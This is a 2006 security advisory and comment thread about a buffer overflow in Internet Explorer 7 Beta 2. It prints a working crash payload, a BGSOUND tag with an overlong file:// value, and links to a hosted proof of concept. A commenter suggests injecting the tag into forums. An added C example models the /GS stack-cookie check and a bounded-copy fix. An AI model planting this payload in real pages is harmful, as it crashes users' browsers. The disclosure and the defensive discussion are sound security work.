A buffer overflow within Internet Explorer 7 Beta 2 allows attackers to execute arbitrary code or cause a DoS and crash the program.

Credit:
The information has been provided by Tom Ferris.
The original article can be found at: http://www.security-protocols.com/advisory/sp-x23-advisory.txt
Tom Ferris's blog post about the vulnerability can be found at: http://security-protocols.com/modules.php?name=News&file=article&sid=3169

Vulnerable Systems:
* Internet Explorer version 7.0 Beta 2 (7.0.5296.0)
When a specially crafted .html file is opened, urlmon.dll improperly parses the 'BGSOUND SRC=file://---' value (approx. 344 dashes), which causes the crash.
The following HTML code will trigger the crash:
<BGSOUND SRC=file://-----------------------------------------
------------------------------------------------------------------------------- ------------------------------------------------------------------------------- --------------------------------------------------------------------------------
---------------------------------------------------------------- >
Or access the following URL: http://www.security-protocols.com/poc/sp-x23.html

Subject: Remote code execution is not possible
Date: 5 Feb. 2006
From: Raul
We did confirm that the bug crashes IE. However, we did not find that the bug was exploitable by default to elevate privilege and run arbitrary code.
This bug had already been found during our code review and analysis that is a mandatory part of our development process; it was scheduled to be fixed before our next public release. We do not believe this bug is easily exploitable, and as an extra defense, the /GS flag also catches the overrun. This is a compiler flag that tells Windows to watch for some classes of buffer overflows. If Windows sees a problem, it kills the application, in this case IE, instead of running the exploit code. While this is certainly not our primary line of protection, it does offer defense-in-depth to help keep our customers secure.
At this time, we are not aware of any active exploits taking advantage of this bug. We will continue to monitor the situation and evaluate our response.
http://blogs.msdn.com/ie/
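
As an added illustration (not part of the advisory or of the comment above), the following C program is a simplified model of the stack-cookie check that the /GS flag adds, run against the "file://" plus 344 dashes input from the advisory, next to a bounded copy that rejects the input. The 260-byte buffer size, the cookie and return-address values and all function names are assumptions made for the example; the frame is modelled as a struct so the overrun stays inside memory the program owns.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN 260          /* assumed size; the advisory does not state one */
#define COOKIE  0xC0FFEE42u  /* constructed; a real /GS cookie is random per process */

/* Model of a /GS frame: the cookie sits between the local buffer and the return address. */
struct frame { char buf[BUF_LEN]; uint32_t cookie; uint32_t saved_ret; };

enum outcome { RETURNED_OK, KILLED_BY_CHECK, REJECTED };

/* Unchecked copy (the class of bug). Clamped to the struct so the model never leaves it. */
static void copy_unchecked(struct frame *f, const char *src)
{
    size_t n = strlen(src) + 1;
    if (n > sizeof *f) n = sizeof *f;
    memcpy(f, src, n);       /* runs through buf into cookie and saved_ret */
}

/* Bounded copy (the fix): refuse anything that does not fit, NUL included. */
static int copy_bounded(struct frame *f, const char *src)
{
    size_t n = strlen(src);
    if (n >= sizeof f->buf) return -1;
    memcpy(f->buf, src, n + 1);
    return 0;
}

/* Build "file://" plus `dashes` dashes, copy it, then do the epilogue cookie check. */
enum outcome parse_src(size_t dashes, int bounded)
{
    char url[512] = "file://";
    struct frame f = { {0}, COOKIE, 0x00401000u };  /* constructed return address */
    if (dashes > sizeof url - 8) dashes = sizeof url - 8;
    memset(url + 7, '-', dashes);
    if (bounded && copy_bounded(&f, url) != 0) return REJECTED;
    if (!bounded) copy_unchecked(&f, url);
    /* /GS terminates the process here if the cookie changed, before the return is used. */
    return f.cookie == COOKIE ? RETURNED_OK : KILLED_BY_CHECK;
}

int main(void)
{
    static const char *name[] = { "returned normally", "killed by cookie check", "rejected" };
    printf("344 dashes, unchecked: %s\n", name[parse_src(344, 0)]);
    printf("344 dashes, bounded:   %s\n", name[parse_src(344, 1)]);
}
```

In the model, the check turns the overrun into a crash rather than a clean return, while the bounded copy removes the overrun itself.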

Subject: IE bug
Date: 7 Feb. 2006
From: sardanapalo
IE sux!
So do micro$oft development skillz...

Subject: Re: IE bug
Date: 8 Feb. 2006
From: GrrWooD
I have to say that was a dumb misinformed statement. If you had
a chance to sit down and look at some of the code coming out of
Microsoft you would know better. Just 'cause you have to pay for
Microsoft does not mean that it is a flawed product.
Also, given that they have opened their testing phase to the public,
giving everyone with a keyboard a chance to tell them what is wrong
with their product or what they would like to see added to their
product is what you usually see with open source: "giving the customer
what they want not what they think you want"

Subject: Should a subject really be required
Date: 8 Feb. 2006
From: WhiteAcid
sardanapalo; I'd like to see you make something better. I in fact really like the new beta versions of IE. I will most likely only use them to test my web applications as it's not my primary browser, but I still think it is a great improvement on the previous version. As Ben Goodger said, a browser battle will always benefit the users :)
Raul, I wouldn't say that the bug is difficult to take advantage of; the web developer simply needs to include some code in the source code of the site. I doubt you'll see this bug being used for anything other than people playing small practical jokes, so its severity is low. That doesn't mean that it's difficult to take advantage of. Just imagine if someone could XSS that code into a forum, it'd make the thread unreadable by IE7 users.
What puzzles me is how you would go about finding a bug like this. The original author said:
"So I saw that Microsoft released IE 7.0 Beta 2 to the public today. So, I figured I would give it a quick look at and I just happened to find something within the first 15 minutes into testing."
To me that insinuates that he was simply browsing, why would he 'by chance' visit a page with that code on it?

Subject: IE BuG
Date: 27 Feb. 2006
From: ahab
If Windows sees a problem, it kills the application, in this case IE, instead of running the exploit code. While this is certainly not our primary line of protection, it does offer defense-in-depth to help keep our customers secure.

Subject: david
Date: 6 Jul. 2006
From: m_datohotmail.com
Something wrong with my explorer. I want to redownload it